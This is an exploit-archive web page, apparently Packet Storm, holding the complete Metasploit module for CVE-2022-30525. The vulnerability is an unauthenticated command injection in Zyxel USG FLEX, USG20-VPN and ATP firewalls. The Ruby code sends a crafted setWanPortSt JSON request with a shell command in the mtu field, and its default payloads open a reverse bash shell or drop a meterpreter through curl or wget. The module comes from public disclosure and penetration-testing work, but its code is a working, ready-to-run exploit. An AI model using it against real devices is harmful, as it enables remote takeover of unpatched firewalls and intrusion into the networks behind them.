exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zyxel Firewall ZTP Unauthenticated Command Injection

Zyxel Firewall ZTP Unauthenticated Command Injection
Posted May 16, 2022
Authored by jbaines-r7 | Site metasploit.com

This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.

tags | exploit, remote, cgi
advisories | CVE-2022-30525
SHA-256 | ab9073cd14f8ea730621aa93b69a0d03cb5f9d8e92dbc88068fca19ff77f6fab

Zyxel Firewall ZTP Unauthenticated Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
'Description' => %q{
This module exploits CVE-2022-30525, an unauthenticated remote
command injection vulnerability affecting Zyxel firewalls with zero
touch provisioning (ZTP) support. By sending a malicious setWanPortSt
command containing an mtu field with a crafted OS command to the
/ztp/cgi-bin/handler page, an attacker can gain remote command execution
as the nobody user.

Affected Zyxel models are:

* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
* USG20-VPN and USG20W-VPN using firmware 5.21 and below
* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7' # Vulnerability discovery and Metasploit module
],
'References' => [
[ 'CVE', '2022-30525' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
],
'DisclosureDate' => '2022-04-28',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPS64,],
'Privileged' => false,
'Targets' => [
[
'Shell Dropper',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_MIPS64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'curl', 'wget' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

# Checks the build date that is embedded in the landing page. If it finds a build
# date older than April 20, 2022 then it will additionally check if the model is
# a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
# seems like a reasonable approach.
def check
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
unless res
return CheckCode::Unknown('The target failed to respond to check.')
end

unless res.code == 200
return CheckCode::Safe('Failed to retrieve /')
end

ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
if ver.nil?
return CheckCode::Safe('Could not extract a version number')
end

if ver[0..5].to_i < 220420
model = res.get_html_document.xpath('//title').text
if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
end
end

CheckCode::Safe("This determination is based on the build date string: #{ver}.")
end

def execute_command(cmd, _opts = {})
handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
print_status("Sending command to #{handler_uri}")

# this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
# but it's more involved.
http_payload = {
'command' => 'setWanPortSt',
'proto' => 'dhcp',
'port' => Rex::Text.rand_text_numeric(4).to_s,
'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,
'vlanid' => Rex::Text.rand_text_numeric(4).to_s,
'mtu' => ";#{cmd};",
'data' => ''
}

res = send_request_cgi({
'method' => 'POST',
'uri' => handler_uri,
'headers' =>
{
'Content-Type' => 'application/json; charset=utf-8'
},
'data' => http_payload.to_json
})
# Successful exploitation can result in no response (connection being held open by a reverse shell)
# or, if the command executes immediately, a response with a 503.
if res && res.code != 503
fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")
end
print_good('Command successfully executed.')
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close